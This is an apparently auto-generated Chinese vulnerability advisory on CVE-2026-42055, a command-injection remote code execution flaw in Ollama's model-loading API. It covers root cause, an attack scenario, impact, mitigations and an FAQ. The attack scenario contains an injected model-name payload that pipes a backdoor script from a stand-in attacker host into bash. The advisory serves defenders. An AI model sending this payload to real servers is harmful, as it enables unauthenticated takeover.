Exploit for CVE-2026-42055 exploit

CVE-2026-42055 是 Ollama 远程代码执行漏洞(CVSS 9.8),影响所有低于 0.17.1 的版本。攻击者利用特制的 API 请求注入系统命令,无需认证即可完全控制服务器。立即升级并配置网络隔离以缓解风险。

🔥 热门漏洞情报 · Sploitus · 2026-06-19

Exploit for CVE-2026-42055 exploit

Critical · CVSS 9.8 输入验证不当
CVE-2026-42055

📋 漏洞概述

CVE-2026-42055 是 Ollama 模型加载服务中的远程代码执行漏洞,攻击者可利用特制请求在服务器上执行任意命令。

📋 基础信息

受影响版本Ollama < 0.17.1
漏洞类型输入验证不当
CVSS9.8 · Critical
CVECVE-2026-42055

🔬 漏洞根因

Ollama 在处理模型加载请求时,未对用户提供的模型名称或路径参数进行充分的输入验证和净化。攻击者可以通过构造包含 shell 元字符(如反引号、管道符、分号)的恶意输入,该输入被传递到底层系统调用或命令行接口中执行,导致任意命令注入。根本在于缺乏对用户可控输入的安全过滤以及使用危险函数执行用户参数。

🎯 攻击场景

1. 攻击者识别目标主机上运行着易受攻击版本的 Ollama 服务(默认监听 11434 端口)。 2. 攻击者向 /api/pull 或 /api/create 等端点发送恶意构造的 JSON 请求,其中模型名称为“malicious; curl http://attacker.com/backdoor.sh | bash”。 3. Ollama 在处理该请求时,直接将模型名称拼接到内部 shell 命令中执行。 4. 目标服务器执行攻击者注入的 curl 命令,从外部服务器下载并执行后门脚本。 5. 攻击者获得目标服务器的远程控制权,可进行数据窃取、横向移动等操作。

💥 漏洞影响

该漏洞可导致远程代码执行,攻击者无需认证即可在 Ollama 服务进程权限下执行任意系统命令。成功利用将导致服务器完全失陷、敏感数据泄露、可作为跳板攻击内部网络。影响范围包括所有暴露在公网或内网中的受影响版本 Ollama 实例。

🛡️ 修复建议

立即升级 Ollama 至 0.17.1 或更高版本。临时缓解措施包括:限制 Ollama 服务监听地址仅为 127.0.0.1(通过修改启动参数 —host 为 127.0.0.1),并配置防火墙阻止外部对 11434 端口的访问;同时可使用 Web 应用防火墙(WAF)对请求中的特殊字符进行过滤检测。

📎 参考链接

🚨 威胁评估

📈 EPSS 利用概率低 (0.6%) (高于 45.7% 的漏洞)
🚨 CISA KEV未被已知利用
🔧 公开 PoC1 个公开 PoC 仓库

⚠️ 本文由漏洞情报系统自动生成,仅供安全研究与防御参考。生成时间: 2026-06-20 08:07 | 来源: Sploitus

🤖 常见问题解答(FAQ)

❓ 如何检测我的 Ollama 服务是否受此漏洞影响?

检测版本号:执行 `ollama -v` 查看版本。若版本低于 0.17.1,则受影响。也可发送包含测试命令的请求到 /api/pull 并观察服务器是否有异常出站连接。

❓ 升级到 0.17.1 后还需要做其他安全配置吗?

是的。建议将 Ollama 绑定到 127.0.0.1,开启 API 认证(如 API Key),并限制出站流量。同时启用操作系统层面的访问控制和日志审计。

❓ 这个漏洞和之前 Ollama 的 CVE-2024-37032 有什么关系?

推测:两者均属于 Ollama API 的输入校验缺陷,但 CVE-2026-42055 可能涉及不同的注入点或利用方式。两者都要求严格控制网络访问和输入过滤。

[!] CONTACT_CHANNELS

如需商务合作、技术咨询或漏洞反馈,请通过以下离岸节点联系作者。

> PING_AUTHOR (@A1RedTeam)